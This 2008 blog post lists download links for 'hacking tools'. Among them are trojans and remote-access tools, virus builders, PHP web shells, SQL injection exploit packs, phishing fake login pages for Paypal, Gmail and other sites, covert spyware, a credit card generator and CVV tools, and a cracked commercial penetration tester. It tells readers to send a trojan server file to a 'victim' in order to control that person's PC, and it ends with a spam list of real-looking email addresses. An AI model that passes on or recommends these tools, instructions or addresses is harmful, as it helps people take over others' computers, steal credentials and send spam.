Monday, September 8, 2008

Hacking Tools

Hacking Tools:

1> Hacker's Tool Set (45 Hacking Tools)

* IMC Grahams Trojan

* IMC Ice Dragon

* Myspace Password Cracker

* IMC Myspace Phisher

* Ultra Surf

* Rapid Share Account Gen

* MSN Nudge Madness

* Ice Reloaded MSN Freezer

* IMC Handbook

* BrutusAE2

* Lord PS

* Hoax Toolbox

* IMC Word List

* Blues Port Scanner

* Bandook RAT v1.35

* Project Satan 2.0

* EES binder v1.0

* File Injector v3

* Remote Desktop Spy v4.0

* Passive Terror v1.3 Final Edition

* Dyn-DL (Dynamic downloader)

* Silent Assassin v2.0

* Net Scan Tools v4.2

* Rocket v1.0

* NStealth HTTP Security Scanner v5.8

* Attack Toolkit v4.1 & source code included

* Legion NetBios Scanner v2.1

* Battle Pong

* TeraBIT Virus Maker v2.8

* p0kes WormGen 2.0

* JPS Virus Maker

* IRC Ban Protection

* IRC Mega Flooder

* FTP Brute Hacker

* RAR Password Cracker

* Vbulletin 3.6.5 Sql Injection Exploit

* IPB 2-2.1.5 Sql Injection Exploit

* IPB 2-2.1.7 Exploit

* Cain & Abel v4.9.3

* NetStumbler 0.4.0

* Cryptor 1.2

* VNC Crack

* Mutilate File Wiper 2.92

* Hamachi 0.9.9.9

* pbnj-1.0

Download:

http://rapidshare.com/files/34738681/IMC_Tool_Set.zip.html



2> password cracker 2008, AMAZING

http://rapidshare.com/files/107921330/Passwordcracker_2008.rar



3> Google Hacking Tools + Ebooks

http://www.megaupload.com/?d=JAB5QMVW

or

http://rapidshare.com/files/76347010/Googl...ls___Ebooks.zip



4> Rapidshare Toolkit New [2007]

Bypass 1 hour LImit

Credit card generator 2007 NEW

Grabber 1.4.7 C

no. 1 proxy

Rapiddown 5.9 SE Cracked NEW

RApidshare Downloder ( Download as premium)

Rapidshare Premium Accounts NEW

Rapidshare.com Hack (unlimited Downloads).

And Much more

CODE

Download Link :

http://www.orbitfiles.com/download/id1932215772.html



5> web hacking tools

Very RARE to get these...grab it..

Apache Hacking TooLz Directory:

Apache Chunked Scanner

Apache Hacker Tool v 2.0

Apache H4x0r Script

Remote File Inclusion And Remote Command Execution Directory :

IIS 5 Dav Scanner & Exploiter

PHP Attacker

PHP Injection Scanner & Exploiter

XML-RPC Scanner & Exploiter

Databases & SQL Injection & XSS TooLz Directory

Casi 4.0

ForceSQL

Mssql BruteForce TooL

SQL Ping 2

SQL Recon

SQL Vuln Scanner

SQL & XSS TooL

PHP Shells

**** v2.0

c99shell #16

Backdoor php v0.1

r57shell

ajan

casus15

cmd (asp)

CyberEye (asp)

CyberSpy5 (asp)

Indexer (asp)

Ntdaddy (asp)

News Remote PHP Shell Injection

PHP Shell

phpRemoteView

nstview php shell


CODE

Download:http://rapidshare.com/files/2447667/WebHacking_TooLz.rar




6> MorTal_TeaM_Yahoo_Virus_Psw

THIS IS TROJAN PROGRAM.. USE UR OWN RISK..

Server copy: C:\WINDOWS\system32\Svchost32.exe

Trojan Name: MorTal TeaM Yahoo Virus Psw

Port: 8888

Server size:116 KB

Client Size:276 KB

Coded In : Visual Basic

Author:E.M.I.N.E.M

http://rapidshare.com/files/74520088/MorTal_TeaM_Yahoo_Virus_Psw.rar

Send the server.exe file tour VICTIM and when he OPENS it in HIS PC u can control his PC wid the client.exe file

But first u have to connect to the VICTIM BY by ENtering IP address



7> Dem0nyc Trojan v1.1 96% UD

Download

http://www.2shared.com/file/3233025/4081c782/Dem0nyc_Trojan_by_Nytro.html

is missing an ocx file which should be kept at the extracted file and I have uploaded it to the following link:

http://www.fileflyer.com/view/GvrZ3BA



8> Core Impact 4.0!! (LEAKED!!) -- $2450 Program

This RAR has no password and comes with the General License Key..

IF the key does not work then change your computer date back to the year 2004 and you shall have working Core Impact 4.0!


Description

CORE IMPACT enables you to see your network from an attacker’s viewpoint by replicating real-world, remote and local attacks that …

* test servers and workstations for OS and services vulnerabilities

* gauge the effectiveness of IPS, IDS and other perimeter defenses

* validate vulnerability scanner results to distinguish real threats from false positives

Download

http://rapidshare.com/files/65488716/coreimpactv4.rar

ATTENSION :

DO NOT APPLY THE CRACK PROVIDED IN THE ARCHIVE.

Just change the system date to dd/September/2004
where dd is any date between 1-31...





9> LAN Atacker

http://rapidshare.com/files/124404683/LanAttacker.rar



10>Web cracker 2.0

Code:

WHAT IS WEB CRACKER? This program exploits a rather large hole in web site authentication methods. Password protected websites can be easily brute-force hacked, because there is no set limit on the number of time an incorrect password or User ID can be tried. Web Cracker was designed for Web Masters to test the vulnerability of their own sites. It SHOULD NOT be used by unauthorized persons to hack into web sites. Such use is ILLEGAL and could have SEVERE PENALTIES. Neither myself nor anyone involved with the development of Web Cracker will be liable for the misuse of this program. Use Web Cracker ONLY at your own risk, ONLY for lawful purposes, and ONLY on your own web site.

http://rapidshare.com/files/106919934/WC.rar



11> MSN Messenger and Hotmail accounts cracker

http://rs4.rapidshare.com/files/67541185/MSN_Messenger_Account_Cracker_v2.zip



12>GFI LANguard N.S.S. 8.0

scans your entire network, IP by IP, and provides information such as service pack level of the machine, missing security patches, open shares, open ports, services/applications active on the computer, key registry entries, weak passwords, users and groups, and more. Scan results are outputted to an HTML report, which can be customized/queried, enabling you to proactively secure your network - for example by shutting down unnecessary ports, closing shares, installing service packs and hotfixes, etc.


Download:

http://rapidshare.com/files/116914839/GFI_LANguard_Network_Security_Scanner__N.S.S.__8.0 _Build_20080326.rar


Password:

warezscene.org



13>Messenger Detect v2.75

Monitor and record all MSN chats, AOL (AIM) chat, Yahoo chat, and ICQ chat on your Local network automatically and secretly! It's the one for ALL!

Download:

http://rapidshare.com/files/123931045/MD275.www.sxforum.org.rar

Password:

www.sxforum.org



14> Google Hack v1.6

Important : Google is a pretty powerful search tool. You knew that. You can use it to find information, but you can also use it to find downloadable MP3s, books, videos, and other items. We're going to assume you're just looking for legally available downloads, but the truth of the matter is if someone's posted an MP3 (copyrighted or not) to their web page, Google can find it.

But who has the time to memorize all the search modifiers like "-inurlhtm|html|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(.mp3|.wma|.ogg) ?" That's where Google Hacks comes in. This handy little app will let you search for dozens of file types, song lyrics, cached pages, fonts, and other little goodies hanging out on the web.

http://rapidshare.com/files/131123095/Google_Hack_v1.6.rar



15>Server Flooder

http://rs247.rapidshare.com/files/121345975/Ventrilo_Flooder.zip



16>Turkojan Crypter Free 90% [UD]

http://rapidshare.com/files/130682530/Turkojan_Crypter.rar.html



17>Rapidshare Solution Hack 2008 Edition

Rapidshare And Megaupload Search Plugin Maker

Rapidshare Anti Leech Decrypter 4.0

Rapidmule Rapidshare Downloader

BrutalDown Rapidshare Tips And Hints

Rapidshare/Megaupload Speeder

Rapidshare-The Way You Like It

Rapidshare Account Generator

Rapidshare Leeching

Unlimited Rapidshare With IE

Premium Account Checker

Rapidshare Links Decoder

Renew IP - Gigaset SE105

Rapidshare Time Resetter

RapidLeecher v4.5 Beta

Mac Rapid1.6a Beta11

Premium Accounts 115

RapidLeecher v4.4.87

Rapidshare Checker

Briefcase Leecha 1.83

Rapidshare Decoder

USDownloader 1.3.3

Get Rapidshare 6.0

Rapget v0.96 Beta

The Grabber v1.4.1

Link Grabber v3.1.4

MegaLeecher 1.0.4

Rapidget v1.0

RapidUp v1.1


Download:

http://rapidshare.com/files/74792915/RTools_2008.rar



18>AIO Wireless Hack Toolz

Includes::.


√ NetStumbler-0.4.0 : wireless access point identifier - listens for SSIDs and sends beacons as probes searching for access points.

√ Kismet-2005-08-R: wireless sniffer and monitor - passively monitors wireless traffic and sorts data to identify SSIDs, MAC addresses, channels and connection speeds.

√ Wellenreiter-v1.9: WLAN discovery tool - uses brute force to identify low traffic access points; hides your real MAC address; integrates with GPS.

√ WEPcrack 0.1.0: Unix based-pearl aplication encryption breaker - cracks 802.11 WEP encryption keys using the latest discovered weakness of RC4 key scheduling.

√ Airsnort-0.2.7e: encryption breaker - passively monitoring transmissions, computing the encryption key when enough packets have been gathered.

√ Wepwedgie-0.1.0-alpha: for toolkit that determines 802.11 WEP keystreams and injects traffic with known keystreams in order to crack WEP in minutes.

√ Hotspotter-0.4: Wireless client attacking t??l.

Most programs are open source, and very useful if you know what your doing.

Note:some of these programs render.useless windows.based.systems.

links to how to install are provided in the package, as there is support for windows there as well.

Download:

http://rapidshare.com/files/115666892/aioWHT.rar




19> Astalavista Security Toolbox DVD 2008 v5.0 | 3 GB

Astalavista’s Security Toolbox DVD is considered to be the largest and most comprehensive Information Security archive. As always we are committed to provide you with a resource for all of your security and hacking interests, in an interactive way! The Information found on the Security Toolbox DVD has been carefully selected, so that you will only browse through quality information and tools. No matter if you are a computer enthusiast, a computer geek, a newbie looking for information on “how to hack”, or an IT Security professional looking for quality and up to date information for offline use or just for convenience, we are sure that you will be satisfied, even delighted by the DVD!

Download:

http://www.filefactory.com/file/ed294c/n/AST_v5_0_pm_part01_rar

http://www.filefactory.com/file/8c1e13/n/AST_v5_0_pm_part02_rar

http://www.filefactory.com/file/77f53b/n/AST_v5_0_pm_part03_rar

http://www.filefactory.com/file/da23fd/n/AST_v5_0_pm_part04_rar

http://www.filefactory.com/file/68629d/n/AST_v5_0_pm_part05_rar

http://www.filefactory.com/file/9d8622/n/AST_v5_0_pm_part06_rar

http://www.filefactory.com/file/db3039/n/AST_v5_0_pm_part07_rar

http://www.filefactory.com/file/324b33/n/AST_v5_0_pm_part08_rar

http://www.filefactory.com/file/75cfc7/n/AST_v5_0_pm_part09_rar

http://www.filefactory.com/file/b7715f/n/AST_v5_0_pm_part10_rar

http://www.filefactory.com/file/a58c41/n/AST_v5_0_pm_part11_rar

http://www.filefactory.com/file/851c70/n/AST_v5_0_pm_part12_rar

http://www.filefactory.com/file/86ec66/n/AST_v5_0_pm_part13_rar

http://www.filefactory.com/file/9b5446/n/AST_v5_0_pm_part14_rar

http://www.filefactory.com/file/e5f7d8/n/AST_v5_0_pm_part15_rar

http://www.filefactory.com/file/83057d/n/AST_v5_0_pm_part16_rar

http://www.filefactory.com/file/df6441/n/AST_v5_0_pm_part17_rar

http://www.filefactory.com/file/eddf58/n/AST_v5_0_pm_part18_rar

http://www.filefactory.com/file/d19bad/n/AST_v5_0_pm_part19_rar

http://www.filefactory.com/file/ff101a/n/AST_v5_0_pm_part20_rar

http://www.filefactory.com/file/c0ec33/n/AST_v5_0_pm_part21_rar

http://www.filefactory.com/file/0356eb/n/AST_v5_0_pm_part22_rar

http://www.filefactory.com/file/3bd2a1/n/AST_v5_0_pm_part23_rar

http://www.filefactory.com/file/d5d3fe/n/AST_v5_0_pm_part24_rar

http://www.filefactory.com/file/bc1fe0/n/AST_v5_0_pm_part25_rar

http://www.filefactory.com/file/8ee799/n/AST_v5_0_pm_part26_rar

http://www.filefactory.com/file/1a6073/n/AST_v5_0_pm_part27_rar

http://www.filefactory.com/file/ba43fb/n/AST_v5_0_pm_part28_rar

http://www.filefactory.com/file/6fe0d2/n/AST_v5_0_pm_part29_rar

http://www.filefactory.com/file/bbbb26/n/AST_v5_0_pm_part30_rar

Password: www.ddlarea.com



20> Cain and Abel

The following appendices work to support these endeavors with the Cain and Abel application. Current versions of this application can be located at the author’s site at

CODE

www.oxid.it.

What you will need:

1. current version of Cain from

www.oxid.it


2. Windows 2000 or Windows XPSP1 configured workstation

Getting started:
Cain is an easy application to install and configure. However, there are several powerful tools that should only be configured after you fully understand both the capabilities and consequences to the application and the target network. After all, you can’t very well hack a network if you take it down. Proceed with caution.

you will need to know what you are trying to hack. This appendix assumes that you are trying to get the administrator’s username and password for the network. The focus of this appendix is on obtaining that information. The other appendices in this chapter deal with other capabilities of the application to gain access to a network. To this end we need to accomplish the following steps to get the admin account:



21> Leviathan Auditor 1.0

Leviathan is a network auditing and penetration tool which runs on and againist Microsoft machines. It dumps Users, Groups, Services, Shares, Transport devices and MAC addresses over port 139 or 445.

http://astalavista.com/media/directory/uploads/03df78ed60e9ff58d04c5403f05c01a9.zip




22> Inzider 1.2

Shows which processes listen at which ports, and can be useful for finding Back Orifice 2000 when it's hidden in another process. Before Inzider there was no other tool that could do this in Windows.

Inzider may in some cases cause Windows programs or the Windows operating system itself to crash. In rare cases this might cause permanent damage to your Windows installation.

Download Link
http://www.astalavista.com/media/directory/uploads/109b1161df18d5ff54c91dab455661d7.exe



23> Complete IIS Exploit Pack

Pack Includes
__________

Checkers

Sigle&mass Scanners

Exploits (perl,c,exe)

Tutorials and more..

DownloadLink:

http://rapidshare.com/files/107823269/h4cky0uIIS_PackedBy_ZaRoX.rar



24> Shell pack + some bonus toolz

sH3ll •••

-Antichat Shell v1.3

-Ayyildiz Tim -AYT- Shell v 2.1 Biz

-aZRaiLPhp v1.0

-c100

-CrystalShell v.1

-Cyber Shell (v 1.0)

-dC3 Security Crew Shell PRiV8

-Dive Shell 1.0 - Emperor Hacking Team

-DxShell.1.0

-ELMALISEKER Backd00r

-GFS web-shell ver 3.1.7 - PRiV8

-h4ntu shell [powered by tsoi]

-JspWebshell 1.2

-KAdot Universal Shell v0.1.6

-Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit

-Macker's Private PHPShell

-Mysql interface v1.0

-MySQL Web Interface Version 0.8

-NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version

-Perl Web Shell by RST-GHC

-Private-i3lue

-RedhatC99 [login=redhat-pass=root]

-****.v.1.0

-s72 Shell v1.1 Coding

-Safe0ver Shell -Safe Mod Bypass By Evilc0der

-Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2

-SimAttacker - Vrsion 1.0.0 - priv8 4 My friend

-SimShell 1.0 - Simorgh Security MGZ

-SnIpEr_SA Shell

-WinX Shell

-Worse Linux Shell


••• Vuln Scan •••
-GoogleRFI + MassInjector in Perl

-MaD-CW XSS & Remote File Inclusion Scanner [Win]

-PerlGroup Scanner RFI

-REMOTE FILE INCLUDE SCANNER SHELLBOT

-RFI Scan created by Ironfist

-Scanutil 1.1 by ToRNadO

-Shellbot with VulnScan m0d by AdvAnCeD

-RFI-SQL scanner

-VulnScan v6 + Spread + Defacing Tool v2

-VulnScan v7 -Final- By k1n9k0ng

-VulnScan v8 by PcW0rm [iTA by s[H]4g]

-VulnScan v9

-XeviL Perl Script 1.0 By ar3s


••• Oth3r t00lz •••

-BUNNY BOT Version 0.1

-ConnectBack Backdoor Shell vs 1.0 by LorD

-Flud2Mail (F2M) 0.1

-FTp brute forcer

-iMHaBiRLiGi PhpFtp V1.1

-LocalLinuxExploitFinder

-Mass Defacer And Log Eraser PRiV8

-Multi-thread FTP scanner v0.2.5 by Inode

-NetGaurd FTP Brute Force

-PHProxy

-RST MySQL tools

-scan - K. Script v0.3 Beta By DiVaBoY

-Simple FTP brute by ReZEN

-S l a v e Z e r o IRC B0t

-Stealth ShellBot Vers 0.2 by Thiago X

-inDEXER And ReaDer

CODE

http://rapidshare.com/files/23510214/Shell_s.rar.html





25>Windows Hacking Toolkit 2008

Windows Haking Tools software is specifically designed for Windows system. Information Security and Ehical Hacking course from Appin Knowledge Solutions is the first step to take for all aspiring Information Security professionals.

Here are some key features of “Information Security and Ethical Hacking Course”:

· Pioneer product in information Security and Ethical Hacking

· Presentations ranging from Introduction to Information Security and Ethical Hacking to Computer Forensics

· Interactive Live Information Security Videos

· Security and Ethical Hacking tools to provide hands on Practice

· Live simulation games to test the skills learned in a real life environment

· The course includes the latest Hacking attempts expected in the year 2006 to past case studies on intrusions done in the past

· More than 40 Security Videos and Demonstrations.

· Live Security / Hacking tools

· Simulation Security games.

· Understand the Windows operating System from Security Perspective.

· Tools to protect your self from Virus, Trojans, worms and other Hack attacks.

· Tools and firewalls to protect your computer and Network from Spy-wares.

· Methods and technology to secure your Internet

· Ways to trace forged emails

· Teaches you how to secure your e-mails

· Faculty with more than 20 years of experience at the core of the course

CODE

http://rapidshare.com/files/108300670/WindowsHackingTools.rar



26>Goolag Scanner

Goolag is a new hacking tool created by legendary hacker group"Cult of the Dead Cow" this tool is freeware and also open source, hacker can take action with this tool easily by using GOOGLE

http://tiny.hackgyan.net/goolag




27>Bypass ur internet provider monthly bandwith

Cable_Modem_Modification_Kit_V8.1

Cable Modem Hacking Guide With Pictures

CODE

http://rapidshare.com/files/91661160/Cable_Modem_Modification_Kit_V8.1.part07.rar

http://rapidshare.com/files/91659587/Cable_Modem_Modification_Kit_V8.1.part14.rar

http://rapidshare.com/files/91659569/Cable_Modem_Modification_Kit_V8.1.part12.rar

http://rapidshare.com/files/91659566/Cable_Modem_Modification_Kit_V8.1.part08.rar

http://rapidshare.com/files/91659564/Cable_Modem_Modification_Kit_V8.1.part17.rar

http://rapidshare.com/files/91659559/Cable_Modem_Modification_Kit_V8.1.part15.rar

http://rapidshare.com/files/91659555/Cable_Modem_Modification_Kit_V8.1.part06.rar

http://rapidshare.com/files/91659542/Cable_Modem_Modification_Kit_V8.1.part18.rar

http://rapidshare.com/files/91659538/Cable_Modem_Modification_Kit_V8.1.part02.rar

http://rapidshare.com/files/91659537/Cable_Modem_Modification_Kit_V8.1.part05.rar

http://rapidshare.com/files/91659523/Cable_Modem_Modification_Kit_V8.1.part04.rar

http://rapidshare.com/files/91659522/Cable_Modem_Modification_Kit_V8.1.part16.rar

http://rapidshare.com/files/91659516/Cable_Modem_Modification_Kit_V8.1.part09.rar

http://rapidshare.com/files/91659498/Cable_Modem_Modification_Kit_V8.1.part11.rar

http://rapidshare.com/files/91659491/Cable_Modem_Modification_Kit_V8.1.part10.rar

http://rapidshare.com/files/91659489/Cable_Modem_Modification_Kit_V8.1.part13.rar

http://rapidshare.com/files/91659486/Cable_Modem_Modification_Kit_V8.1.part03.rar

http://rapidshare.com/files/91659482/Cable_Modem_Modification_Kit_V8.1.part01.rar

Pass: rapidworld.i67.org



28> Ultra Hacker toolkit AIO

Wide useful collection of tools.

CODE

http://www.sendspace.com/file/fk433s



29>007 Spy Software v3.874
007 Spy Software is a stealthy computer monitoring software which allows you to secretly record all activities of computer users and automatically deliver logs to you via Email or FTP, including all areas of the system such as email sent, Web sites visited, every keystroke (including login/password of ICQ, MSN, AOL, AIM, and Yahoo Messenger or Webmail), file operations, online chat conversation, and take screen snapshot at set intervals just like a surveillance camera directly point at the computer monitor.

Distinct from ALL other spy products on the Internet, 007 can directly send logs to your email box without tweaking and tweaking the annoying SMTP configuration, even your own SMTP server is NOT required at all! Other great features include password protection, suspend on idle, monitoring schedule, HTML report, logs sorting and searching, as well as a solid stealth technology that prevents virus scanners and spyware detectors from detecting/disabling it. With this amazing spy tool you will be able to see exactly what people have been doing online and off-line just like you are looking at the computer monitor over their shoulders! Strongly Recommended!

CODE

http://rapidshare.com/files/59240619/007.Spy.Software.rar



30>Paros Proxy

A Java based web proxy for assessing web application vulnerability. It supports editing/viewing HTTP/HTTPS messages on-the-fly to change items such as cookies and form fields. It includes a web traffic recorder, web spider, hash calculator, and a scanner for testing common web application attacks such as SQL injection and cross-site scripting.

http://astalavista.com/media/directory/uploads/cf13699f2c667dd09e1fd86aa7306687.exe



31>Cool Injection Tools Pack

prjSiteHack.exe

Microsoft JET Database Engine error(Shop 1).exe

Microsoft OLE DB Provider for SQL Server error(Shop 2).exe

Microsoft OLE DB Provider for ODBC Drivers error(Shop 3).exe

Microsoft .NET Framework 2.0.exe

MozillaControl1.7.12.exe

Attacker.exe

autolink.exe

CheckCC.exe

checksql.exe

CVV2 Retriever.exe

ExploitSQL.exe

getLink.exe

GURLE.exe

JoinQuery.exe

Hack SQL 1.exe

Hack SQL 2.exe

VH@ Hacker Tools(Beta)

AKD- SQL INJECTION V2.5.exe

CC2Bank 1.3

Download:

CODE

http://rapidshare.com/files/105821816/Tool_Hack_Collection_2.0.exe



32>Firefox Add-Ons


1.Dark Firefox Theme

There are a few dark Firefox themes available but the one I've been using lately is NASA Night Launch.
You can install the theme from here :

CODE

https://addons.mozilla.org/en-US/firefox/addon/4908

Note: This is really awesome but only for the dark color lovers
---------------------------------------------------

2.FireBug - Website debugging tool

Firebug integrates with Firefox to put a wealth of development tools at your fingertips while you browse. You can edit,
debug, and monitor CSS, HTML, and JavaScript live in any web page...

CODE

https://addons.mozilla.org/en-US/firefox/addon/1843

--------------------------------------------------------

3.Ad N Edit Cookies - Cookie editor

Cookie Editor that allows you add and edit ession and saved...

CODE

https://addons.mozilla.org/en-US/firefox/addon/573

--------------------------------------------------------------

4.HackBar - Penetration testing tool

Simple security audit / Penetration test tool.

CODE

https://addons.mozilla.org/en-US/firefox/addon/3899

--------------------------------------------------------------
5.TorButton - Proxy button

Torbutton provides a button to securely and easily enable or disable the browser's use of Tor. It is currently the only addon

that will safely manage your Tor browsing to prevent IP address leakage, cookie leakage, and general privacy attacks.

CODE

https://addons.mozilla.org/en-US/firefox/addon/2275

------------------------------------------------------------------------
6.FoxyProxy - Proxy manager

FoxyProxy is an advanced proxy management tool that completely replaces Firefox's limited proxying capabilities. It offers

more features than SwitchProxy, ProxyButton, QuickProxy, xyzproxy, ProxyTex, TorButton, etc.

CODE

https://addons.mozilla.org/en-US/firefox/addon/2464

-----------------------------------------------------------------
7.Server Spy - Server software viewer

Server Spy indicates what brand of HTTP server (e.g. Apache, IIS, etc.) runs on the visited sites.

CODE

https://addons.mozilla.org/en-US/firefox/addon/2036

-------------------------------------------------------------------------
8.FlagFox - Website Information

Displays a country flag in the status bar depicting the location of the current website's server, and provides quick access

to detailed location and webserver information.

CODE

https://addons.mozilla.org/en-US/firefox/addon/5791

-----------------------------------------------------------------
9.Refspoof - Spoofing bar (not for FF3)

CODE

http://downloads.mozdev.org/refspoof/

-----------------------------------------------------------------
10. XSS-Me - XSS auditing plugin

CODE

http://www.securitycompass.com/exploit_me/xssme/xssme-0.2.1.xpi


=======================================================

11. SQL Inject-Me - SQL auditing plugin

CODE

http://www.securitycompass.com/exploit_me/sqlime/sqlime-0.2.xpi

=======================================================

12. Access-Me - Test for Access vulnerabilities

CODE

http://www.securitycompass.com/exploit_me/accessme/accessme-0.1.xpi

=======================================================

13. Hostipfox - show the site IP

CODE

http://www.hostip.info/firefox/hostipfox-0.4.3.5.xp

=======================================================

14. Leet Key - 1337 translator

CODE

https://addons.mozilla.org/en-US/firefox/addon/770


=======================================================

15. InfoRSS - 1337 RSS and ATOM reader

CODE

http://inforss.mozdev.org/installation.html

======================================================

16. Web Developer - Website development tools

Adds a menu and a toolbar with various web developer tools.

CODE

https://addons.mozilla.org/en-US/firefox/addon/60




33>Bios Utilities All-In-One

Contains:

01: Bios Agent v3.45

02: Magic Bios v2.0

03: BIOS Patcher v4.00 RC 7.1

04: Bios v1.35.1

05: BIOS Information Tool v1.1

06: CmosPwd v4.6

07: E-book: The BIOS Companiont

BIOS Patcher v4.00 RC 7.1

BIOS Patcher can find and fix errors in your system BIOS (only AWARD BIOS for now) and also it can add or open new features, i.e. some features that your BIOS has but they are closed by manufacturer of your motherboard. It scans rom file. If it finds any known errors it fixes the errors. If it finds any closed features it opens it.

Link:-

CODE

http://rapidshare.com/files/113739847/Bios_Utilities_All-In-One.rar



34>٠•All in one Fake Pages•٠·

Check out my collection of fake pages.. Just upload it on free hosting..

Included fake pages:

>AIM

>Ebay

>Facebook

>Gmail

>Hi5

>Hotmail

>My space

>Paypal

>Photobucket

>Rapidshare.com

>Runespace

>Yahoo!


CODE

http://rapidshare.com/files/107360228/fakes_.rar



35>BestCrypt 8.04.4

BestCrypt data encryption systems bring military strength encryption to the ordinary computer user without the complexities normally associated with strong data encryption.

BestCrypt creates and supports encrypted virtual disks and these disks are visible as regular disks with correspondent drive letters. The data stored on a BestCrypt disk is stored in the container file. A container is a file, so it is possible to backup a container, move or copy it to other disk (CD-ROM or network, for instance) and continue to access your encrypted data using BestCrypt.

CODE

http://astalavista.com/media/directory/upl...a593b7220a2.exe



36>Small Spamming Mail List

CODE

amalie@fampedersen.net

arishtfabrics@gmail.com

beccy@spanteladsl.net

bjarne@fampedersen.net

bjarnep@gmail.com

chanmo509@peoplepc.com

convallestefano@hotmail.com

convallestefano@liberamente.net

convallestefano@tin.it

convallestefano@tiscali.it

dieycari0812@verizon.net

enw@pmskenya.com

fantacalcio@email.it

fantacalciop.a.@katamail.com

fwyss@imocom.com.mx

g.s.ricciano@katamail.com

gian_dim@otenet.gr

homesales@spanteladsl.net

ignaciod@pvre.com

imocom@prodigy.net.mx

info@pvre.com

info@sanxoaquin.com

isaac@pvre.com

jan.arild.risan@nktv.no

jl@dabox.de

jtrume@dimaquin.com

jtrume@envapac.com.mx

jtrume@gmail.com

jtrume@hotmail.com

jtrume1@prodigy.net.mx

juancarlos@trujillomeza.com.mx

karina@fampedersen.net

kbr@imocom.com.mx

krille_ahlgren@telia.com

lenka-lapa@ya.ru

lesley@microsoft.com

lindavuxem@versatel.nl

lory__mel@hotmail.com

meister@lima-nfz.de

michael.white30@ntlworld.com

momofatt@hotmail.com

otros@imocom.com.mx

pemo@mail.dk

philpeb@columbus.rr.com

raveesh.jain@gmail.com

riccasrl@ospedaleragusa.it

rmoo4i8481@blueyonder.co.uk

robert.nadj@sbb.co.yu

ross_edwards@roadrunner.com

samirpaitod@yahoo.co.in

saqib@tsck.org.kw

sara@fampedersen.net

sbergm@dean.no

sebelius@mail.dk

snej1973@freenet.de

sousa162@sapo.pt

steconval@virgilio.it

t_hrysicos@exemail.com.au

tbgibbs@amerion.com

tgalvan@tampabay.rr.com

tgibbs@amerion.com

transcribe@alphabtech.com

tripodman@spanteladsl.net

tripodman@terra.es

unirea@katamail.com

uxem0001@zonnet.nl

ventas@sistemaspymes.com

virlogeux.jc@9online.fr

vmtm@imocom.com.mx

woelki-oliver@t-online.de



37>Nuclear RAT 2.1.0

Feature highlight:

- Unicode support, you can see folders, windows, text, in any world language, that Windows can support. Tested with korean, japanese, arabian, vietnamese, chinese, portuguese, spanish, russian, and more! (Check the screenshot)

- Very fast and secure listings (for windows, file manager, network manager, etc). Navigate through the remote computer HDD like if you were opening on your local computer! Use the "Go To" commands to reach the folder you want, perfectly fast. The same applies to the registry!

- Improved keylogger, you won't have problems with double accents (~~, ´´), get a smooth result from the keylogger, and easy to read text

- Network manager allows you to browse the other computers in the same LAN (that are already authenticated), upload, download and delete files from those other computers in LAN! No need for installing a server on another PC (just to browse the LAN shares)

- Hybrid support for both direct and reverse connection modes. You can receive connections on your client at the same time you connect to direct connection servers

- Huge list of possibilities for process injection, decide where to inject your server, where to install, startup methods, and have full control over your server creation. Inject to default browser, custom windows, start any type of program, inject to winsock enabled applications, inject to all applications, etc

- Multiple transfers at once (multi-threaded) or queue transfers system.

- Very powerful plugin system, where you may add anything your mind could think of. Add netlimiters, socks, encryption, rootkits, compression, password stealers, cd key stealers, offline keyloggers, anything!

- Support for very big files, up to 5 PB

- Intrinsic help system, clicking the "?" will help you understand certain functions from the program

- Multi language support for the client, see the program on your primary language (should be available soon)

- Filemanager with Quick Edit feature: edit plain text files without having to download them and upload again! Also, there's a new "Create New File" feature, makes you able to create new files quickly, without having to upload a new file!

- All transfers have "resume" feature, even network transfers. Resume folder downloads, uploads, downloads and network uploads and downloads

- Very fast IP scanner, use the remote machine to execute IP range scans for you

- Two other new revamped features: Connection Bouncer and Remote Service Reacher. Those improved functions will help you to reach the remote computer services that doesn't allow direct connections from WAN

CODE

http://tiny.hackgyan.net/NRC




38>18 in 1 password recovery

Package Includes :
1. Accent Office Password Recovery v2.31

2. Access Password Recover v1.01

3. Access Password Recovery Genie v1.80.20051008

4. Access Password Recovery Helper v1.60

5. Active Password Changer Pro v3.0.0280

6. Adult PDF Password Recovery v2.3.0

7. Advanced Instant Messengers Password Recovery v2.80

8. Advanced Office Password Recovery Pro v3.04

9. ElcomSoft Advanced Passsword Recovery Studio 2005

(All ElcomSoft password recovery tools in one package)

*Proactive Windows Security Explorer 1.0.0.1

*Advanced ZIP Password Recovery 3.54

*Advanced RAR Password Recovery 1.51

*Advanced Archive Password Recovery 2.20

*Advanced Office Password Recovery Professional 3.02

*Advanced Office Password Breaker 1.30

*Advanced PDF Password Recovery 1.48

*Advanced PDF Password Recovery Professional 2.20

*Advanced WP Office Password Recovery 1.20

*Advanced Lotus Password Recovery 2.0

*Advanced Intuit Password Recovery 1.33

*Advanced ACT Password Recovery 1.21

*Advanced Mailbox Password Recovery 1.7.0.198

*Advanced Instant Messengers Password Recovery 2.50

*Advanced Access Password Recovery 2.5

*Advanced VBA Password Recovery Professional 1.50

*Advanced Outlook Password Recovery 1.33

*Advanced Outlook Express Password Recovery 1.20

*Advanced IE Password Recovery 1.20

*Advanced EFS Data Recovery 2.10

*Advanced Windows Password Recovery 2.9.1.224

*Advanced Disk Catalog 1.51

*Advanced eBook Inscriber 1.0.0.1

*Advanced eBook Explorer 1.1

*Advanced eBook Processor 2.2

*Advanced Registry Tracer v1.67 SR2

10. Intelore Word Password Recovery v1.0E

11. Passware Kit Enterprise v7.5

12. Password Spyer 2k v2.5

13. Proactive System Password Recovery V4.1.3.455

14. RAR Password Cracker 4.12

15. SeePassword v2.05

16. Ultimate ZIP Cracker v7.3.1.5

17. Visual Zip Password Recovery v6.0

18. ZIP Password Finder v1

Download:

CODE

http://rapidshare.com/files/17752635/mrW.TuX.PassAIO.rar.html




39> RapidShare Database Searcher

Do you want to search rapidshare? Try this tool...
Info:

Welcome to the world's largest file search engine!

If you have ever searched for, sent or received any files online, you've probably heard of RapidShare - the world's premium site for uploading files. Literally millions of files are uploaded to RapidShare every day; from photos and movies, to music albums, to software packages. But there is only one one problem... RapidShare doesn't allow you to search their files. So if you are looking for something specific, you don't know where to go.

And here's our solution!

We have built a sophisticated software that locates RapidShare file links on the Web and allows you to search for them. Your only task is to enter your keywords, such as movie title, actress name, song or album title, and so on. Our software will browse through the Web looking for RapidShare links with your keywords in the title or description, and will present you a comprehensive list with results.

The whole RapidShare world - at your fingertips...

